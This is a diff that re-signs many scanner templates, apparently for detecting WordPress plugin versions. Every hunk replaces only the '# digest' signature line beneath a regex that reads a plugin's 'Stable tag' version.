@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a0047304502210080833f0a6f6965bf701a9f8f85c42f13aced2edfa3c92f35b7bf9b2949f30c92022010f4ca3a59b6d406300c386db8a6df73c29dbe232100869a5813747db8f85ee1:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220166a059abad47d7810570e6774f74158bf750b6709c96a77756130e70d29cbb2022100bf66279eb5123f8cecc13dd1ed4087eeeb0d072eaffaa41977a70cc829785c27:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100f1d2f7f6be6fddf20850b4703b6ab5b8d957c3e74b071534c1bc6ad7fe41436502202a71f99ce82762f27add68abbe7a23d4240623238e94b985bfca1ee61f0d6da8:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022017ee505dcca18ebab680043b9925f57984d15f24be30f3f0ec870f6a7dceeca8022100abfbd24fce7dae963b3ed486a507e06d30ba8df3471283206e59a6eca66a25e3:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402205c5109cf3bacc2b8cc218a17cfe92ee3fe4d72de8ac73e91373f19d9b8c3d31b0220238301247108e18a2cba0ed47c36b28c5c8faecfd5240ec31685b0d90441bd88:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502204016d00b414a89aa5ee3e46fd9bf70b4e6e52f59a21d6c051a3649b5ddcc3e6e022100a287c6b188915ed6124a9a1d037cfa445780b9e261d0d4dba376f3f2905f6a67:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402203e53d59041d41a70647f545a55fcfdff1cdbc2a49aadf9b5f659ae93371918d50220098775c59e3b87e6be78842156c7241c18d7a0b357642133f15f77be8d7cab55:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100fb0d6a1c264fd9f2133b11d868175b69427130562ffeda26f311e59499c31ff602204560a3e5ec893280c5d927554304b0ef9a401f8f515662c0c8853b675f89956d:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100a1ddd14f6387bf2982f4bce8fbc3a4947b77511c0efeab680f998557dd7fe530022004d54454b173b3799de58a0775b79229217011002c27b5e37f88e9c4153b93b7:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100d6a1f77e361161159079a8c9808d996b8f300de6e7f9879c44b7a5fcbaa754c70220549f66c482dc25ce5859081734f6859d254dcb5e1faf2a50059fb884d889a3b0:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450220199adf3dca06dbafdf15f58c0e059c580c690a47298d88590d067df01557fe3e022100bb1480a6c06a9560a4d844220066a6513f5332c08eff31695cd0d53e308d17f3:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100dc067167944e4479be804de00ef189955c02218d61594796a5528c5f14efbeeb022100cc886ea0fd38c9f26a26735b898b0e92d2664441cf3da7f97fbe0a0781348354:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100d8bf8d7d16e101d6da570588e7d4bda90f3928c5b700764a4e8ac07ca18ae480022100e11a1d19fccc35366ea3bd589f834d04b6ec9ca887e3418c8e53a82ee433cd40:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022012e44aec7725638cd18ee6ca09389a5b8a098851e09d76c0c61463e5ef87dae2022100c5cd95f4d634e51f124e0b09cdeb6f6d59c56a90a1375be8dcc0b966437f6102:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402200cfe429a4d25d4c22eb6a61b7b52d17ebe6c552dd47c64b762c5794e6f97adee0220686ef471e2c5d52316f84fbd116e2399d3593896d23ba69b8dbb1a512672f4f1:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502206a7409f7c925e71550c67e07908d0b5984127972a2d98e5f0a71db575e87482b022100e7b8b47bdfc6245558f4e851998901f5eee2ba79bf99f77e4bcaa77c1dd32e8b:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100c01646b0575cf57b2cb4501545ed40118eaacea85bcd059deb9ca88cab465cbd022100ef8a8c51ab8767a3f508b14e58f2398285c81a59f4ce9db52471230d7580d406:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100fe4d7a22bfa930cc84cf3e766d3d24b173cf9ddddec0e2909659ab7b9edac8170220428436f17b011cd10dde2133a64ee98ab25db91ec1198ff9e081e40a1cec7891:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022032b67759d95061453c79b65aae1ce69db442ef30e8c3862cefc1fbe2330af108022100e6254d64680e63f7d2d8a7f7af20e6ef835244a4b1c44b2fbb88d6bdd4705a0e:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100f42a4cae6ddf40b5c8d65917db76e4a736afe8b4a5aaa4bd8cd70e04660e82b40220502b93dc5c68027663c8a3529cb4074ab0e7296354beda213a9ba553056eccd3:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100fbbca3ca6c09d499a91c098066a03d7f924acb85fe36cc16576ac9e094ac6a2f022100933b104bbfea964358b544b4d3f7d430eb5a36fac2ebe8b092fa17a7c9e469d3:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a0048304602210087f1678cdce7b228c96bc3fa1c81648cb1778f9d7e529fd4e3af9eabbcb80f56022100e21925e821ab239facc011f7be0a73ae79116a36a6393149d76d53b2678aaf5f:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a0047304502200a4a26539eb02e22d38401adebe67d953400c3c14e580580d4a8fc3d754ecfcd022100c25d7740d7c685f9e94fbdca6ff1d44d10c350b9f1c81bed889328c190d86f49:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022011b93e838a576f4d3d9beea54328017dd16c648cbe1ddfef8a05c597517f072b022100b1cefc60d6ccbd4614b41f2823da7842e4285c1ddb7cecaadbfc03d732f87e8d:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100c99ce9c2661bdd54d56574864437371d73ab0e3428fa01c6c97b59f4967c5571022100adefcdc30c2ea9fc724bd55cd401ac2cac54da31c66a6220d55be63f65540162:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022068e59c0035d3c92eac3e53fb8bccd089e2ef8e409751d733b6aa9f493445179f022100bc52130b4aba52b9abbb507f6d3e38d206caa3ccde453b292b3086995e1f5e99:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a0047304502203319cae360469622929a306469361144fb7009f1ec8dd83b0f2c4379d37f28d2022100aa505c450bde75b22e385ee558457c15e2a6b76f9411e9c1c9fab8f7ab057081:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100aad2510bd151347032697d590682148f6658eb33922225cead84a0c15d1dbe6b02204a27be731170c7a3c1fbd71f672f9345022caaf8bb0a570ed88477f41ebe611c:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100a496713fca262e4114aa39459f8d553dde5950316e7bba69b3cc4c620faadfdf0220206948c12de5016492989f912f1c7bdda92ac1c382d195d4ef4b71278bb4062d:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022004060c2f261be85351b8193a3a43fd42342b024bc89aa7e2009956b8022f4624022032df190f49c0657edb79e98c39f63ca750cae5dae460dfc35c8628f2610b3fcb:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100acb053fe0a5bfb3aabcd385031058e4b026062054f7be3a2738de05c99fd8cc702210083c1906b99db11b71208f89de95811f00e1f5605d11dfaed947b338b72408fe2:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502204d82ad204ba61bb7164eeb5fa952765bf807868964de02e4a9ab7dc983e53bef022100ce9689aefce36b88f8e67d7c8c0aacf0863c7c68e2f4d7ecf2f2d5744b7ff2aa:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a004630440220706cafe45eb4aafb06ccd9303881494059a06ba5475496cca5464505fd1f57f5022003579197521eaf3e883b42b82cbc71de9317d459db82a1e999fee877229937a8:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100dd0171e3e288ea767ed340ca8252d7f7c818ffcc658327b47557d4431cd519aa022100866ede0cb789962656f0df49e2ba1039061cdb86dfbf49cb32ce3c2dea8a81fb:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100928cc763b02f807158b7e3774309ded6bc41cee14f18e816d5aa7971d72303aa0221008efd26b1804b4e3a554830db5f5258ac20ee5a7fca4f699de709c9d06eb6e76c:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100dbfeffe12d3f9b7ca85f90ed53ab0349cb98788ae33a7ccd359c0cabfa889937022016725322eed4c545d8ee64c33677227d98c42a634240c4672cd6166fd4e5a464:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450220362d55eacd4e0529ccbcd5c2cc6409c896fbcbe11098945c7a7effa5942ece34022100ea08980ed018f320b620f6a38a225db823f964221f68d98345406d6212596a89:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a004830460221008d2f89e74851e58ad68f44fbc00705839b30857b79a677ff8c7a9937a2c64f88022100aafb996dcdd048384f32c57de2f1a8235887ca8b33fc54ea68f9682073f200e4:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450221008e2103855103fa095a6a057a621f43f85536b8711147339f17b8a8166d6b704b0220173a7844f0a3b8f36a51940aec38b4f7f9db0e8cdc517786bdba50a446442840:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100fcf3db9cbeb1730a802e1802a57c54eafc4e2fba0cbd812190964a335a6fe7a00220468ef4049eae008d783b7b67dfbff39a669f58a9abc24aa2aa6db249b5109f76:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100bb5b9bf4cddc55618adc2637ef5bab88dd83ed99f9c241cf947df4baf73ff4de02210088084bd1099c88dc0d1ecdae1b879ee7ddc22cd559a39ed6a0b6592e487f11a8:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100fecea6afbc40fd74001395896acf1b30b19f856d8ff9c0aba27d90eed6bbc8c5022100bf215c242a5e18bea1730661e86fee7d576fa150feebab75506ab63070e13e99:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100e160202a9722fcc926977cde9aec31160b512981d9104f157c15844394c211b5022036c9664ae6bb1f496f8f19744ff9a3f22641aaac7a9f24f1527818e0cf00f74e:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220314a4c8ecc934abb59e2eb470b3be784ae64fe7b6403f95130c4821a58cd3504022100e692853b3c1669ed8d42c712997a1466c04d7b1e646866569b2867c08547c3ea:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100f30a511bb4cb04fc0d2904238befde7f653d65db079c31038586a084059953b3022001424a080669776cd9b03feddfc4d1d2029642a01b61d97b5845e2d01359ba50:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450221008e0dfb1128d1cda1207be0c50a778abc43ebe5e6c085581c43d50e76ca63da6c02203a3c4bbe9dc45f0bdae3f6fb18d8b0dfd70c8793fee098a06d30c6d9e9b69ced:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402206a2b8804e1cd5e7e40a434cfad3563d07e88e23891b307e90565da0c8ab4557a02207054488675272bd7d60e9dcab6bdf45610e6d1bc5955611d4ef802ec81c4ec3d:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402201513d0ee12dbb91822e10d3db8be7e387227f8a74514b942454d7263c0af067102202e7de7aee2ce00b92a97d62cc18371d473d88e62131d4c88d59e071a875104e0:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450220756ba6b0e0f30dbeb081bf7c46eeeb63ebb1c2c315075eed2f5ee63b08d0b072022100f50d24aeb7f09b5ac704a3f9ceded626e91d40be83d746eff7a486858c08de8f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450221008aadaf04995cde392c0c04d8a98c22ddd393fbb9d2e8a23a7f8bdf9d9e37735c02203d0950232ab17b87e9513a5298435eb3075dfda62eacbd92e180a3eca7340bd7:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022011f85a18447ff448d109a0433febb9f8727ded57766fd8ba80d31b6058e1a350022008759eafea04b10896bb4355555670f1d2272cb38da91efb2259d3bd2eb45eac:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450221009c1dd3fa78b85d538e1b5951ff23725442e0b63d779abeae89809ddccb55355502204280df661d93c01f1617cea9616e35791a8729bf4447c53fbf3a1bd2a85117d8:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a004730450221009a23998cc90decc40981cb31cc864550865e6251a2c3b85f039db19961500120022028dbcd170f15a83a85d19ee42fd87da5169a495f2ea5b70464299de56929d13e:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100e133684f432712e81c8570016efc2ad1fc2654b91aaafb25aaba244e134f17b002203c15cbaf49d1f0cdcb5a24de66cd7be429b7c87d23f8cc276970dff5e06368a7:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100ce7607354ffbd0c6edf64b9f09bc3b5e170bc5eba7d64a2531dae81c8435c844022100b50b2eddded8c1ece094c98530e583ad4fcfdf4c80924f376740919d5a568741:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450220525904ddb0b069e2164b263ab6601ca85721f5469b28b022b87f2303e9f2e0ee022100888e35d8de626bf523638a6ed01b830aac3b88c4f746b96ef89a501ba97256cf:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100f1b42628d60cdb8d761ec22ebc34e1266b2e288637d1408d355608942596727a022016b994ba1d89d06f67aca3d67448816f5295c5e1388555e74a9fdb9ce8e9ddd5:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100a762ee27dc941b7bb17a5d4a2ba520c5c9745a505cc658e0e1f0e8b8c98ee637022100f72e12f184fde733c4f8319e399d99e86824f318e09e8ddd33af22e63669fb76:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a004830460221008f2710add8dc7ba07d9bcd4054db30f6800216725d5ce413c6e89449a0b11e6b022100d362cb55b6719c7183710d999331ce302beacbe382becc20a25a761dc1877964:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100eee3ee1a4c6c4a3cf2a727f2724e7d91b3dd28d8b85b53effbb5d7a490016fb4022100ef30bd5f1d04f4c61449dc06fae53ed2b27b524f1b02ec96b7ef0714fafe3593:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a0046304402200ee1025c95b5a716ddd952fb681405b4bb79f4c49062e84a80a29a005a53fb8f02200807465c86930997a8f42de5696742add674c864bad2814690688a82d8390c3f:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022035e23b0fcb1eae118b330b06f27f922295127203d327787730576b4398b1181c02202219f15393df4092804e23ff98e3b312e80c21b947b44eb2c8fdbb7a3db08e40:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100950a254061a9f4333ed1d6b4cde994fe094b918a43e796a4b44236cbdb15ff01022100dfcae8f7a976cd502d31d6119783f695aac6e004a679c221a7d174bfe8fbfa9a:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022069d185e708d79f2539b188d366ec68f069ff6e6c8d5ff11e2a04616684d3e5a80220593e20f63e0793e09867a641413ad56b11b2f5d6d741040ffb73e359cba1af16:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100aa07b543553bcbf298cd20833dac22d3309ade0e5f582cf3ca443de8bc4f3499022100c6aec46e5e4390780bf50b576646b05da18121407bd138878a232f448928bdfc:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220490a32ba460eaeffc2c2b37be79a1b25376cba2fd18816c4d2c2317efde5f59102204d2b1c8633455a478c1952a05534088091e5240afad4cb7405afea0e23d0e13f:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100da919fa1a860ce5e7293971adad434fbe43caad3ed1ee5b3f7de49780108aefc022100b56e41b80436f0e0209f54fc1d249904476aaa362c248ab60607d1fa0a38a51e:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022017371035f143b0d21f58a8521a5ac68a21c7d0e428f850db6c2945cce6224de402201f7d1ba518620b4817fb38ac790bbbd55180923a9c35de784021db5d3081b47c:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022003e7bb755e61bf228a1a866d8c4c9478623c53f93511aa7cd74addd85104e83b02206438794ba370a44f90e0470f0bf889b02dc0156c3f95cc5403f6008e1aec4fa0:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402203f77bb6cc0af4f7f1f3517efcd0a60007848147e6b23275783309180c15e4fec022038dcb32a271f20c5e6150edeff22bce776454a45fa962c272a0197277c1a2969:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a004830460221009aeed5e82d2edca95813538ef1e6d2dfb4484d45f0e97075dfcbc7aedff8cac2022100a918d568502a8403d0c22f8d995e578940e42d74a396924de9e6f60737729e9f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502201cbb4ab1ecb6d7772754e15aacdc5f5ac93562c240b6df7d2ab7d0e1a64678700221008638722958a574199b188b58d737f920d0b325ac90c2bf9638f8725b422814b8:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a004630440220118669fd621d8bc6045fd32d2c5dd90a4d0c427fa19e3db2c4686bd3d8c3d149022005f7269c1de6320915f40dd85b4f9f3e87c9125b62d3b473b53b8092c91992db:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402202245e20826ceb1bc1861146581bcf03e0adb1db7e38204dc5ef2817ed06cf2e102207541942da845963a9f08245a025b2121354291deb1c602b6f3808ab261bcb757:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100cbed62875d3692e3f3e9705bb48c8eab5bf6f28ba462607a07365e2a4050048c022100aa2d0905eabc20d45736a849fbcdd3e9e54f38f729901b6bf8fb5bd97ef4a19c:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100d37d9705c5e7a9f0b935cbdc2bafea0d5bfabd99fef4bf264fdbc3496f91f8720220319ccdc96c979eb145e36d9090e9f12a5957f9856b45c3d93a264371cbb1890a:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022050b192331ce5e822e33402dd92a8002f9d5962fc086058a482215fa8ec31adb502203779749438d08de3122ca1acf91eaa6b5d71e616315d9b82bca9ec8f9f89d96d:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100c7428bfa2e3519bbe94bf1dadea21b13d5093f051577b764f0a78c6cdfdc64bc022029632e972c84ed40b61bf9a22b083a68d0de72b9ae9130d6464cbcb232cf1b91:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 490a00463044022052ab1b165373a65038ba5d21657088bc61190c4dbd633b787bafe14872a5be520220209de48da1e61227320ae2e450142291bd5c24f1caf36d0ebfbca616f1af8e46:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502204666dc86947420231526c0be85ed8cf94c957606d0b0ae1d41d99b1d7f8ced03022100eaa48f848689386b7bfa1ed8cb3abfbb81e48c3005581f795bcdc9dae1f80497:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4a0a00473045022100a7c325ec42e7b460db367853d16a7b89f71bc6c2cb726da19e69406f9aee847e022038e88ff320bf24e13702b3b6e14b627444a12cd16200b232e39fb2d14f1dabf1:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100e64f356d8b4640ea1cccee85fb837660979b49118c86e3f1bf79e68a6d39479202200edfc794060a5af67e27caeac27cf56da4dae907b3e55857dee5a84440cbf3ac:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- '(?i)Stable.tag:\s?([\w.]+)'
|
- '(?i)Stable.tag:\s?([\w.]+)'
|
||||||
# digest: 4b0a00483046022100e340f466e81bcb1d29bc2aa4e9905cf3fa94a0eac98b175de5182a6f7c580075022100fce1c938bc50f3ec87cbc1b83eb32870f10e5cd6fc08da91eeab1f26ab1ff72e:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100aedce5a99fed63f397b2ceebae837fa610706cb1abbf460cfa4cf2865ebe10ce02201f2c4fd063f65c9d968cb89e2449a5e4a6ab338b355194c8e743dc65e2eae1fc:922c64590222798bb761d5b6d8e72950
|
|
@ -46,4 +46,4 @@ http:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
